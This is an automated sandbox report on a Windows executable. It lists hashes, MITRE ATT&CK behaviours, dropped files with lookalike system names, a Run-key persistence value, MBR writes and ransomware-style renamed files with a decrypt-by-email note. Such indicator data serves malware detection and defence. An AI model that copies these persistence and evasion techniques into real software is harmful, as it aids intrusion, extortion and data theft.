8b0f9d248e67199bb7f1a778a03e4caee7d267e61d8a7d70fa1c1f6d7944e96a

Analysis

max time kernel
1343s
max time network
1218s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
22-11-2024 02:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
Size

516KB
MD5

b2b0e6184b82144f65389d39f1eadd0d
SHA1

17311fb1fb33da5f303ae30ee7b4b60b80985d2e
SHA256

3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db
SHA512

d1abc2c74aa2bad9ac8a59c1552904e6d65717786ed7a193c4fcda23218371bcad0953848f1e1c5b9df50a86e2549c6da35c6e372366826dc25f042107a8babb
SSDEEP

12288:j3nZMhJ+ubNmzdCanVtkEY70mOpFRxd/GAXl0xtiNe96bgRO:j3nZqfbkzkcvElOpPj/DA2+6ERO

Score

7^/10

bootkit discovery persistence spyware stealer

Malware Config

Signatures

ACProtect 1.3x - 1.4x DLL software 1 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral8/files/0x0005000000019441-51.dat	acprotect

Executes dropped EXE 64 IoCs

pid	Process
2380	svschost.exe
3028	nsf.exe
1388	svschost.exe
1700	nsf.exe
1204	svschost.exe
908	svschost.exe
2076	svchost.exe
2332	svchost.exe
896	svchost.exe
3016	svchost.exe
1512	svchost.exe
2940	svchost.exe
2788	svchost.exe
2720	svchost.exe
2436	svschost.exe
2692	svchost.exe
2824	nsf.exe
348	svchost.exe
1708	svchost.exe
2396	svchost.exe
1936	svchost.exe
2120	svchost.exe
1544	svchost.exe
1916	svchost.exe
2672	svchost.exe
1616	svchost.exe
320	svchost.exe
2124	svchost.exe
1732	svchost.exe
2440	svchost.exe
1672	svchost.exe
2556	svchost.exe
1896	svchost.exe
1548	svchost.exe
540	svchost.exe
680	svchost.exe
344	svchost.exe
2432	svchost.exe
892	svchost.exe
2340	svchost.exe
1484	svchost.exe
2372	svchost.exe
2868	svchost.exe
2820	svchost.exe
2584	svchost.exe
2640	svchost.exe
2832	svchost.exe
2712	svchost.exe
2980	svchost.exe
2588	svchost.exe
1852	svchost.exe
1764	svchost.exe
1888	svchost.exe
1648	svchost.exe
1428	svchost.exe
1656	svchost.exe
1044	svchost.exe
1192	svchost.exe
2268	svchost.exe
2952	svchost.exe
2388	svchost.exe
2248	svchost.exe
712	svchost.exe
916	svchost.exe

Loads dropped DLL 46 IoCs

pid	Process
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
3028	nsf.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
1700	nsf.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
908	svschost.exe
908	svschost.exe
908	svschost.exe
908	svschost.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2824	nsf.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2496	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\scrlk\\svchost.exe"	REG.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\V:	svschost.exe
File opened (read-only)	\??\G:	svschost.exe
File opened (read-only)	\??\H:	svschost.exe
File opened (read-only)	\??\I:	svschost.exe
File opened (read-only)	\??\L:	svschost.exe
File opened (read-only)	\??\P:	svschost.exe
File opened (read-only)	\??\R:	svschost.exe
File opened (read-only)	\??\S:	svschost.exe
File opened (read-only)	\??\J:	svschost.exe
File opened (read-only)	\??\Q:	svschost.exe
File opened (read-only)	\??\T:	svschost.exe
File opened (read-only)	\??\W:	svschost.exe
File opened (read-only)	\??\X:	svschost.exe
File opened (read-only)	\??\Y:	svschost.exe
File opened (read-only)	\??\B:	svschost.exe
File opened (read-only)	\??\E:	svschost.exe
File opened (read-only)	\??\N:	svschost.exe
File opened (read-only)	\??\O:	svschost.exe
File opened (read-only)	\??\U:	svschost.exe
File opened (read-only)	\??\Z:	svschost.exe
File opened (read-only)	\??\A:	svschost.exe
File opened (read-only)	\??\K:	svschost.exe
File opened (read-only)	\??\M:	svschost.exe

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	nsf.exe
File opened for modification	\??\PhysicalDrive0	nsf.exe
File opened for modification	\??\PhysicalDrive0	nsf.exe

Drops file in System32 directory 21 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\__rar_0.274	Process not Found
File created	C:\Windows\SysWOW64\__rar_0.939	Process not Found
File created	C:\Windows\SysWOW64\cfwin32.dll	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File created	C:\Windows\SysWOW64\csrss32.dll	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File opened for modification	C:\Windows\SysWOW64\csrss64.dll	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File created	C:\Windows\SysWOW64\__tmp_rar_sfx_access_check_259433515	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File opened for modification	C:\Windows\SysWOW64\uwnmspwks.rrr	svschost.exe
File created	C:\Windows\SysWOW64\__tmp_rar_sfx_access_check_259445886	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File created	C:\Windows\SysWOW64\__tmp_rar_sfx_access_check_259426090	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File created	C:\Windows\SysWOW64\nsf.exe	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File opened for modification	C:\Windows\SysWOW64\nsf.exe	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File created	C:\Windows\SysWOW64\svschost.exe	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File opened for modification	C:\Windows\SysWOW64\csrss32.dll	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File created	C:\Windows\SysWOW64\default2.sfx	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File opened for modification	C:\Windows\SysWOW64\default2.sfx	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File created	C:\Windows\SysWOW64\__rar_0.945	Process not Found
File opened for modification	C:\Windows\SysWOW64\svschost.exe	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File opened for modification	C:\Windows\SysWOW64\cfwin32.dll	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File created	C:\Windows\SysWOW64\csrss64.dll	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File created	C:\Windows\SysWOW64\NoSafeMode.dll	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File opened for modification	C:\Windows\SysWOW64\NoSafeMode.dll	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-progress.xml(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-core-kit.xml(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host.xml(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL082.XML(!! to decrypt email id 1307002018 to [email protected] !!).exe	Process not Found
File created	C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0289430.JPG(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Apex.xml(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.KR.XML(!! to decrypt email id 1307002018 to [email protected] !!).exe	Process not Found
File created	C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.MX.XML(!! to decrypt email id 1307002018 to [email protected] !!).exe	Process not Found
File created	C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.DE.XML(!! to decrypt email id 1307002018 to [email protected] !!).exe	Process not Found
File created	C:\Program Files\7-Zip\Lang\az.txt(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\7-Zip\Lang\sw.txt(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\jvm.hprof.txt(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkHandle.png(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-modules.xml(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\IconImagesMask.bmp(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGPUNCT.XML(!! to decrypt email id 1307002018 to [email protected] !!).exe	Process not Found
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-progress.xml(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01213K.JPG(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Median.xml(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Computers\computericon.jpg(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\EmbeddedView.jpg(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL089.XML(!! to decrypt email id 1307002018 to [email protected] !!).exe	Process not Found
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-coredump.xml(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145669.JPG(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382952.JPG(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02466U.BMP(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.AR.XML(!! to decrypt email id 1307002018 to [email protected] !!).exe	Process not Found
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multiview.xml(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-threaddump.xml(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148798.JPG(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\GRIPMASK.BMP(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrow.jpg(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\Stationery\1033\NOTEBOOK.JPG(!! to decrypt email id 1307002018 to [email protected] !!).exe	Process not Found
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-progress-ui.xml(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvmstat.xml(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341448.JPG(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.xml(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDisableUpArrow.jpg(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Perspective.xml(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\BREAK.JPG(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTBOX.JPG(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-util-enumerations.xml(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\images\Folder-48.png(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\requests\status.xml(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.ID.XML(!! to decrypt email id 1307002018 to [email protected] !!).exe	Process not Found
File created	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGPICCAP.XML(!! to decrypt email id 1307002018 to [email protected] !!).exe	Process not Found
File created	C:\Program Files\7-Zip\Lang\mng.txt(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jre7\README.txt(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutlineToolIconImages.jpg(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\SWBELL.NET.XML(!! to decrypt email id 1307002018 to [email protected] !!).exe	Process not Found
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\VERSION.txt(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\ROGERS.COM.XML(!! to decrypt email id 1307002018 to [email protected] !!).exe	Process not Found
File created	C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\WANS.NET.XML(!! to decrypt email id 1307002018 to [email protected] !!).exe	Process not Found
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099145.JPG(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099150.JPG(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382944.JPG(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382963.JPG(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHKEY.DAT(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CalendarToolIconImages.jpg(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\GrooveFormsMetaData.xml(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145904.JPG(!! to decrypt email id 1307002018 to [email protected] !!).exe	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svschost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 30 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2812	PING.EXE
2848	PING.EXE
2840	PING.EXE
2168	PING.EXE
2072	PING.EXE
1652	PING.EXE
848	PING.EXE
2920	PING.EXE
2468	PING.EXE
2836	PING.EXE
2744	PING.EXE
2676	PING.EXE
2572	PING.EXE
1728	PING.EXE
264	PING.EXE
2812	PING.EXE
2600	PING.EXE
2980	PING.EXE
2504	PING.EXE
1684	PING.EXE
992	PING.EXE
1392	PING.EXE
1832	PING.EXE
112	PING.EXE
2700	PING.EXE
2024	PING.EXE
1492	PING.EXE
2968	PING.EXE
2172	PING.EXE
2508	PING.EXE

Runs ping.exe 1 TTPs 30 IoCs

Remote System Discovery

T1018

pid	Process
2072	PING.EXE
2812	PING.EXE
112	PING.EXE
2024	PING.EXE
2744	PING.EXE
2504	PING.EXE
1392	PING.EXE
2920	PING.EXE
1652	PING.EXE
2840	PING.EXE
2836	PING.EXE
2468	PING.EXE
992	PING.EXE
2812	PING.EXE
2508	PING.EXE
2600	PING.EXE
2172	PING.EXE
2676	PING.EXE
2168	PING.EXE
848	PING.EXE
2968	PING.EXE
1728	PING.EXE
1832	PING.EXE
